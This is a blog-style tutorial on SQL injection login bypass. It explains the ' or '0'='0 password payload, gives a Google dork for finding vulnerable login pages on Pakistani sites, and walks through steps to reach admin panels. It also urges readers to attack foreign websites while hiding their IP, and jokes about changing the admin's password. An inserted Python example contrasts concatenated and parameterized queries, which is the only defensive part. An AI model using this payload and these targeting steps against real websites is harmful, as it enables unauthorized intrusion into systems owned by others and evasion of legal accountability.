Being the first in a series of articles on the ways to achieve SQL injection, I must first explain what SQL injection entails.
Basically, each website you use is connected to a database at the back end. Whatever information you see on a website is information from a database. The most widely used language to communicate with databases is SQL (Structured Query Language). The syntax of queries may vary from one DB software to another, but they all basically use SQL. In webpages, all the information you supply or anything you click on is converted to a query and passed to the database that you can't see.
In the URL of the website you use, you will often find some gibberish which you won't ever be able to make sense of. I've tried and I can tell you I still think it's gibberish. However, this is where the query actually is passed.
In a weak website, any fields that ask you for values may be exploitable, i.e., you may be able to make the values you pass a part of the original query sent to the database and manipulate it in any way you please. Similarly, in the forms of SQL injection that will come up soon, the URL is exploitable.
SQL injection is basically injecting stuff you want to pass as a query into the original query being sent to the database by the webpage.
Now authentication means verifying that you have the right to access whatever you are going to/already are accessing. When you log in to your Facebook account, you give a username and password. If correct, you're redirected to your account. This is authentication.
Bypass means to go past or go around, avoid.
We are going to learn how to bypass authentication to jump straight to the page we would have reached had we ignorantly logged in.
Now now, I know I've got you all excited with this no-password-straight-to-the-account talk, but you can't hack Facebook, Gmail, Yahoo or any big website's accounts like this. It's quite an outdated way to do things and most websites have put in measures to prevent this.
Here the rules of Website Hacking need a special mention.
Rule 1:
DON'T HACK BIG WEBSITES LIKE GOOGLE, FACEBOOK etc.
One, you won't be able to. They've thought of every vulnerability you have thought of, or will ever think of.
Two, if you do manage to find something, they'll sue you for every penny you're worth and more.
Three, you'll probably spend the next few years in jail.
So be careful.
Rule 2:
I'm an Indian and here the IT Act prohibits you from hacking Indian websites. Found any other country's website? Hack on! Just make sure they don't have the resources to come to India and sue you, because then, your ass is busted.
Rule 3:
Hide your IP. Use a VPN or a proxy server (refer to this if you don't already know what that means, or look specifically at VPNs).
Surprisingly, there still are quite a few websites that have this vulnerability. I found at least a dozen Pakistani websites that have this vulnerability.
How it works:
You find a login form.
In the username field you type "User" (without the quotes) and in the password field you type "Pass" (again without the quotes).
Suppose the table being used for the particular webpage is called "Tbl".
Internally, when you press login, the webpage authenticates your rights and identity by passing the following query (or something like this :P):
select *webpagestuff* from Tbl where username='User' and password='Pass';
Given that the username and password actually are User and Pass respectively, the query will succeed and the webpage will display certain information.
If you notice, whatever you typed in the fields for username and password was passed through exactly as it is.
Is there a way we could alter the query to always return the information?
A way to make the where clause always true?
Of course!
If you were to type jasdhfkjhdfk in the username field and ' or '0'='0 in the password field, the query would become:
select *webpagestuff* from Tbl where username='jasdhfkjhdfk' and password='' or '0'='0';
You see, the highlighted part (' or '0'='0) is what you wrote. What does it do?
The first quote, right before the or, closes the quote that was already open. After that, whatever we write becomes part of the query itself. In any programming language, a statement joined with or evaluates to true if either the part before the or or the part after it is true.
The condition we chose to write is: '0'='0'.
We wrote ' or '0'='0; the final closing quote was already there in the original query!
So we made a condition that will always be true!
The most significant part is the or. It makes the truth value of the preceding statement irrelevant, as '0'='0' will always be true!
Hence, for any value of the username, the where clause will always be true thanks to the password we gave!
We successfully login!
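As an added example (not code from the original post), the query construction described above reproduced in Python against a constructed in-memory SQLite table standing in for "Tbl", with the string-concatenated version beside a parameterized one that keeps the same input from changing the query:

```python
import sqlite3


def make_db():
    # Constructed sample data: one user row, matching the post's "User"/"Pass".
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Tbl (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Tbl VALUES ('User', 'Pass')")
    return conn


def login_vulnerable(conn, username, password):
    # Builds the SQL by concatenating the form fields, exactly as the post
    # describes: whatever the user typed becomes part of the query text, so
    # a quote in the input closes the literal and the rest is parsed as SQL.
    query = ("SELECT * FROM Tbl WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders hand the values to the driver as data, not SQL text.
    # The quote in ' or '0'='0 never closes the string literal, so the
    # WHERE clause keeps the meaning the developer wrote.
    query = "SELECT * FROM Tbl WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    # Runs the post's two inputs (real credentials, then the ' or '0'='0
    # password) through both login functions and reports what each accepts.
    conn = make_db()
    payload = "' or '0'='0"
    return {
        "vuln_real_creds": login_vulnerable(conn, "User", "Pass"),
        "vuln_payload": login_vulnerable(conn, "jasdhfkjhdfk", payload),
        "safe_real_creds": login_parameterized(conn, "User", "Pass"),
        "safe_payload": login_parameterized(conn, "jasdhfkjhdfk", payload),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'logged in' if accepted else 'rejected'}")
```

The concatenated version accepts the bogus username because, with AND binding tighter than OR, the WHERE clause reduces to (false) OR ('0'='0') and matches every row; the parameterized version only matches the real credentials.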
Now finally to how authentication bypass is achieved.
Step 1:
Find a site with a login form. You're going to take years if you don't use Google dorks :P
Type this in the search bar:
inurl:login.asp site:pk
Keep the inurl and site tags where they are and you can keep trying other combinations.
Step 2:
In the username field type any random value. Even jahsdkahdkjah will do the trick :P
The website I'm showing has an option of logging in as admin.
Why not 3:-)
Step 3:
In the password field, type this exactly as it is:
' or '0'='0
Step 4:
The last step is always voila!
Oh look! An option to change the password so the real admin can't login.
Will I do it?
No!
I'm a good guy.
Or am I :P
Psst!
The ' or '0'='0 may not always work. Click here to have a look at other combinations you can use